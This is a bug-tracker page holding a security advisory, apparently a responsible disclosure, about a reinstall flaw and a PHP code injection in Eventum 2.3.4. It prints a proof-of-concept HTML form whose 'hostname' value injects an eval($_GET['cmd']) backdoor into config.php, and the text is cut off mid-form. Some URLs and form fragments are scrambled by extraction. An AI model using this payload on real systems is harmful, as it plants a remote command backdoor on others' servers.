Eventum Security Vulnerabilities Notification
Bug #1271499 reported by
htbridge
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Eventum |
Fix Released
|
High
|
Elan Ruusamäe |
Bug Description
Hello,
High-Tech Bridge Security Research Lab has discovered multiple security vulnerabilities in Eventum 2.3.4.
Preview available here: https:/
Developers can contact us by email advisory (at) htbridge.com for details.
For any questions related to this notification message - please visit our General Information & Disclosure Policy page: https:/
Best regards,
High-Tech Bridge Security Research Lab
information type: | Private Security → Public Security |
To post a comment you must log in.
Hello,
High-Tech Bridge Security Research Lab has discovered multiple security vulnerabilities in your product - Eventum.
Detailed description and all available details of the vulnerabilities is provided below in the email.
Please notify us by replying to this email when you release a security update, and provide us if possible with URL of patch/solution so we can add this URL to the advisory.
If you need more time to fix the vulnerabilities - please specify desired Public Disclosure date by replying to this email.
For any questions related to this notification email - please visit our General Information & Disclosure Policy page: https:/ /www.htbridge. com/advisory/ disclosure_ policy. html
If you don't find an answer to your question there - please feel free to contact us by email: <email address hidden>
======= ======= ======= ======= ======= ======= ======= ======= =======
Advisory ID: HTB23198 /www.htbridge. com/advisory/ HTB23198 L/Au:N/ C:N/I:P/ A:P), 10 (AV:N/AC: L/Au:N/ C:C/I:C/ A:C) /www.htbridge. com/advisory/ )
Reference: https:/
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Public Disclosure: February 12, 2014
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
Risk Level: Critical
CVSSv2 Base Scores: 6.4 (AV:N/AC:
Discovered and Provided: High-Tech Bridge Security Research Lab ( https:/
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application.
1) Incorrect Default Permissions in Eventum
The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application.
The installation script can be access by a remote unauthenticated user via the following URL:
http://[host]/ setup/index. php
2) Code Injection in Eventum
The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in "/config/ config. php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to application’s database, which can be achieved by providing address of attacker-controlled MySQL server.
The following exploitation example injects a backdoor into "/config/ config. php" file:
<form action="http://[host]/ setup/index. php" method="post" name="main"> db_hostname" > table_prefix" value=" db_table_ prefix" > db_username" >
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="
<input type="hidden" name="se...